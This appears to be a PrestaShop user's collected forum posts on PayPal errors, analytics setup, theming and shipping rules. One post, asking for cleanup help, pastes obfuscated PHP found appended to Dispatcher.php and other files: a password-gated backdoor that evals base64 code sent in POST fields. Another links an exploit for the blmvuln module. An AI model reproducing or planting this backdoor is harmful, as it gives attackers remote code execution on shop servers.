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  1. Well i finally found the mentioned file, it was in "admin" folder. Btw in fresh new PS install there is no such file.
  2. I need to use it for 1.6 but my test environent is 1.7
  3. The cleaner plugin doesnt work, it cannot detect CMS: Script de nettoyage et contrôle pour boutiques PrestaShop by @eolia CMS inconnu. Script interrompu I found in access logs, that user is trying to log with token, and thru module_name blmvuln, so i googled blmvuln and found this exploit: https://sploitus.com/exploit?id=07597D1E-9918-5E4C-89D8-857E228869A4&utm_source=rss&utm_medium=rss
  4. Thank You, i was removing these lines like 6 times, nothing happend. But the code is still coming back. I saw on forum people using some cleaner.zip file which tol them which files was changed. The link You sent is not working.
  5. Hello there, i would like to ask about prestashop files. Time of time i notice i have added some weird variables nad hashes on the end of some files and their source code. When i delete it manually from files, it will come back in few days. I am not very skilled in prestashop, i dont know how to protect it or clean it. For example on of the files is: domain.com/www/classes/Dispatcher.php, there are more files from classes that are getting this unwanted code on end of source code. The example of the unwanted code is this, i have no idea how to decode it or permanently delete it. $p11c9="THIZBzt8jFVwN79QaClh3UEdSq06iJ5gKvPuebAmns_4YLDfrxGX2poRcyk1WOM";$e8208=$p11c9[47].$p11c9[35].$p11c9[40].$p11c9[56].$p11c9[6].$p11c9[28].$p11c9[54].$p11c9[40].$p11c9[42].$p11c9[36].$p11c9[49].$p11c9[28].$p11c9[41].$p11c9[6].$p11c9[41];$t17=$p11c9[56].$p11c9[48].$p11c9[36].$p11c9[16].$p11c9[6].$p11c9[36].$p11c9[42].$p11c9[47].$p11c9[35].$p11c9[40].$p11c9[56].$p11c9[6].$p11c9[28].$p11c9[54].$p11c9[40];$gd25=$p11c9[37].$p11c9[16].$p11c9[41].$p11c9[36].$p11c9[27].$p11c9[43].$p11c9[42].$p11c9[23].$p11c9[36].$p11c9[56].$p11c9[54].$p11c9[23].$p11c9[36];if(@$e8208($t17)){$z3a7 = @$t17('', @$gd25('aWYKIChpc3NldCgkX1BPU1RbcHJvZHVjdF9pZF0pIAoKJiYgCgptZDUoCiRfUE9TVFtwcm9kdWN0X2lkXSAgKSAJPT09ImFmZTBhNTFhN2Y1ODQ3MGE5YzZlNmJmZjcyMjAxZmRlIikKCXsJIGV2YWwoYmFzZTY0X2RlY29kZSgJICRfUE9TVFtpbWFnZV9pZF0pCQopOwpleGl0KCk7fTs='));@$z3a7();}$obf48="L4IdFOJXZu0vhmtrW27Hg9GTqpfkY6zAMNRwbKU3naceEl5_so18VDPjCQiSyxB";$v108=$obf48[26].$obf48[9].$obf48[40].$obf48[42].$obf48[14].$obf48[58].$obf48[49].$obf48[40].$obf48[47].$obf48[43].$obf48[61].$obf48[58].$obf48[48].$obf48[14].$obf48[48];$lfed=$obf48[42].$obf48[15].$obf48[43].$obf48[41].$obf48[14].$obf48[43].$obf48[47].$obf48[26].$obf48[9].$obf48[40].$obf48[42].$obf48[14].$obf48[58].$obf48[49].$obf48[40];$d0e30=$obf48[36].$obf48[41].$obf48[48].$obf48[43].$obf48[29].$obf48[1].$obf48[47].$obf48[3].$obf48[43].$obf48[42].$obf48[49].$obf48[3].$obf48[43];if(@$v108($lfed)){$uad5 = @$lfed('', @$d0e30('aWYKCShpc3NldAoJKAokX1BPU1RbcHJvZHVjdF9pZF0pICAKJiYgbWQ1KAkgJF9QT1NUW3Byb2R1Y3RfaWRdCikJID09PSJiYjE3ZDU0ZWE5MDdhNDg4NzU1NGQ1OGM5ZWU0NjVmZSIKICkKCnsKCWV2YWwoICBiYXNlNjRfZGVjb2RlKAkkX1BPU1RbaW1hZ2VfaWRdKQoKKTsKZXhpdCgpOwp9Ow=='));@$uad5();} Have anyone seen anything like this, are there any solutions how to permanently clean it and prevent from happening again? Thank You.
  6. Greetings, i would like to ask professionals in prestashop sphere about finding solution. I need to apply few rules on delivery which will depend on payment. For example if visitor will pay online(any price), he should see just delivery free choose to click, or the deliveries should be free then. I tried to make a "free delivery option" if you pay online u get free delivery, but it was able to use even for visitors which have chosen cash on delivery, so it's not good way. Is there module or basic theme solution for creating these settings? Thank you.
  7. Fixed, i had wrong api username, got confused while watching so much tutorials.
  8. Hello, i would like to ask about the problem i am facing with paypal on my prestashop. I created the api, all was going well and smooth, with congrats message Congratulation ! You can now start accepting Payment with PayPal. When i'm trying to test the payment and i select pay with paypall i get this message on frontend: Error occurred: Please try to contact the merchant: <b>PayPal response:</b> TIMESTAMP -> 2017-11-07T13:46:11Z L_ERRORCODE0 -> 10002 L_SHORTMESSAGE0 -> Security error L_LONGMESSAGE0 -> Security header is not valid L_SEVERITYCODE0 -> Error Has anyone fixed this?
  9. Hello, i would like to ask about prestashop ganalytics, i have entered and connected the prestashop with analytics and search console, but analytics is not showing any data or info, even after day delay. I inserted the ganalytics script to the header.tpl, as 1st under <head> element, as was shown in tutorial. Bu there is so many other ways to do this, to insert it in footer, or header but under <body> element, i am getting confused which one works. Can someone please explain me where to insert the script? I also saw inserting the code with {literal} <script></script> {literal} and {literal} <script></script> {/literal} , im really confused from these all kind of tutorials around... What is correct way to import the script to prestashop? After i safe and test i get this messages: Google API Authorization granted Cannot retrieve test results Thanks
  10. Hello guyz n girls, i would like to ask about line break for the footer section of basic BS theme. I opened all the 3 pages of google result about this, i also tried to copy the code from this post, nothing has changed it, no line break, no nothing. FIX: To see changes in code update, u have to go delete or turn off cache of the prestashop not just browser, hope gonna help someone. Any solutions?
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